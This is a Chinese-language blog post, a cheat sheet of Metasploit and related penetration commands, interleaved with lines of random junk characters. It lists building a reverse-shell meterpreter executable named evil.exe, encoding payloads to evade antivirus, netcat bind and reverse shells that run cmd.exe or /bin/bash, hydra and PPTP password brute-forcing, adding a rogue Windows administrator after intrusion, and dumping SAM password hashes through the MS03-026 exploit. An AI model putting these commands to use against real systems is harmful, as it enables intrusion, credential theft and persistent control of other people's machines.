注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

熊猫正正的博客

熊猫正正的天空

 
 
 

日志

 
 

metasploit常用渗透命令  

2014-11-04 16:14:23|  分类: web安全渗透 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
svn update 升级
./msfweb Web接口127.0.0.1:55555。.
./msfconsole 字符下的Console。
" M$ _6 q+ B: g1 [1 u5 P" }4 I
help 帮助
+ r' V) C( y. e, k8 B# ^
show <option> 显示选项
search <name> 搜索名字
use <exploit name> 使用漏洞
show options 显示选项
1 \" F) W6 `9 Q" v3 q! ^. T
set <OPTION NAME> <option> 设置选项
show payloads 显示装置
2 U1 n' w2 f- I$ T2 V% x
set PAYLOAD <payload name> 设置装置
l3 }9 {9 O! D4 c/ C' t
show options 显示选项
% ?' F* {8 C5 B: y, H
set <OPTION NAME> <option> 设置选项
2 j5 N \6 r0 h; d; |2 Y' r
show targets 显示目标(os版本)
set TARGET <target number> 设置目标版本
exploit 开始漏洞攻击
sessions -l 列出会话
5 v5 A0 @' f0 g z% `/ v, |% {. e6 s
sessions -i <ID> 选择会话
sessions -k <ID> 结束会话
' J# U4 [5 a; e6 c2 g7 e$ n9 O
<ctrl> z 把会话放到后台
' R! K/ V3 b+ p3 S1 Z6 D$ U) ~6 r( o
<ctrl> c 结束会话
jobs 列出漏洞运行工作
jobs -K 结束一个漏洞运行工作
3 w! ^) S4 s9 g. |. i# N
show auxiliary 显示辅助模块
+ u7 u1 V+ M% P2 z# A! m, W5 _
use <auxiliary name> 使用辅助模块
set <OPTION NAME> <option> 设置选项
; i- [+ y& W2 M1 Z* j; p# J
run 运行模块
scanner/smb/version 扫描系统版本
0 g$ z4 v7 g4 B+ o) g
scanner/mssql/mssql_ping 测试mssql是否在线
scanner/mssql/mssql_login 测试登录(暴力或字典)
Attacker behind firewall: bind shell正向
; Q3 x! O# B; Y+ b# A1 s& G! }8 D# ?- \
Target behind firewall: reverse shell反向
Meterpreter衔接不懂dos的可以用这个:
8 D. i# H8 L% X3 x
db_import_nessus_nbe 加载nessus的扫描结果
db_import_nmap_xml 加载nmap的扫描结果
# n) O: r8 k5 R! s* }
自动化攻击流程:
cd /pentest/exploit/framework3
./msfconsole
0 C9 \# V+ s& D' k+ K( G# g# R
load db_sqlite3
: z+ t, r0 u, ?" ~% M
db_destroy pentest
J, e* F( Y0 _' ^3 P9 \' r0 \7 p5 C
db_create pentest
0 {5 f1 V8 m1 @ q/ J2 b
db_nmap targetIP
db_hosts
5 d) z5 \. Q7 ~$ P4 H
db_services
db_autopwn -t -p -e
! c9 V% a* ?4 E! i" d/ ?" f
字符接口攻击流程:
# J, w- G7 m3 Q9 C! H0 f' G4 j& u
./msfcli | grep -i <name>
# [2 i% j" i: w
./msfcli <exploit or auxiliary> S
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E
5 w' o# T6 r: z5 o* x
做木马后门等:
./msfpayload <payload> <variable=value> <output type>
X) z) m& t8 l; N% O
S summary and options of payload
C C language
P Perl
y Ruby
/ H! C( t7 t. @: U+ R
R Raw, allows payload to be piped into msfencode and other tools
& u) e/ R# V9 m. m% w
J JavaScript
X Windows executable
! Y; @6 `2 r% K* I
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
2 |) f0 A# {9 @7 w* q4 P# z
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe
1 O2 X$ K8 `0 i' J( P
编码处理就是做免杀:
./msfencode <options> <variable=value>
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘x00′ -l
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘x00′ -e PexFnstenvMor -t c
$ K T; |+ H2 F
入侵后在windows下添加管理员用户:
hostname 查看主机名
net users 查看用户
* v5 G. W9 N2 F" G. v
net user 用户密码 /add 添加用户
net localgroup 查看工作组
net localgroup administrators 查看管理员组
net localgroup administrators x /add 将用户加入管理员组
; A2 R7 u$ \5 Z5 d5 D* r3 V
TFTP
: J# u; a. G6 G6 l" x, @
cp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上
tftp -i 10.1.1.2 GET nc.exe下载
netcat瑞士军刀
( F6 S. q. [. n: a. R5 ]
attacker: 10.1.1.1
]& B6 C9 }, ?9 Y; Z
target: 10.1.1.2
+ o+ Z/ d: \4 L9 f
nc -v -z 10.1.1.2 1-1024 端口扫描
, ~# p8 _; j; g9 G$ ~
target: nc -lvp 4444 聊天设置(服务)
attacker: nc -v 10.1.1.2 4444 聊天设置(客户)
# q5 l; x0 R# g0 Y `2 T
target: nc -lvp 4444 > output.txt传输文件(接受)
$ ^7 E) m K( S6 C5 j
attacker: nc -v 10.1.1.2 4444 < test.txt传输文件(发送)
" j5 L3 N: Q+ E4 E
target: nc -lvp 4444 -e cmd.exe Bind shell。
attacker: nc -v 10.1.1.2 4444
: u9 S& H1 I; m$ V
target:nc -lvp 4444 Reverse shell。
attacker:nc -v 10.1.1.2 4444 -e /bin/bash
0 [1 G* l: Y" i/ N
2 K$ m5 g' [( p7 Z+ @, [
密码
* M/ Z1 f. c; M7 P
字典zcat /pentest/password/dictionaries/wordlist.txt.Z > words
cat words | wc -l显示个数(30多万个)
0 x$ L" e t2 b! J. m
暴力:
# N, H% f7 a9 k( @' N
hydra -l ftp -P words -v targetIP ftp 攻击ftp。
hydra -l muts -P words -v targetIP pop3 攻击pop3
6 B. }! [5 e' S9 R% E4 ]! R* c+ d
hydra -P words -v targetIP snmp 攻击snmp
1 ?. ^$ T, o# e9 ]! {+ L
攻击microsof VPN
. Q9 j1 V+ O& h3 m/ S* H; l) N4 c
nmap -p 1723 targetIP
0 Y& c6 D. |% K0 Z+ ^
dos2unix words
1 y" g! d" W. f' Y) p
cat words | thc-pptp-bruter targetIP
WYD:
7 i# g$ r( x4 T+ A* y5 O
wget -r www.target.com –accept=pdf 下载pdf文档
, I, d9 J4 h4 s% U- I
wyd.pl -o output.txt www.target.com/
cat output.txt | more
SAM文件(windows下的密码文件):
%SYSTEMROOT%/system32/config
%SYSTEMROOT%/repair
备份windows的hash文件:
2 S+ P3 Y. x; x b6 }
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
5 n/ g- b; k& K! O/ L
meterpreter > upload -r /tmp/pwdump6 c:windowssystem32
meterpreter > execute -f cmd -c
8 `- S& [. }! i& c3 |: r- X
meterpreter > interact x
C:WINDOWSsystem32> pwdump 127.0.0.1
  评论这张
 
阅读(102)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017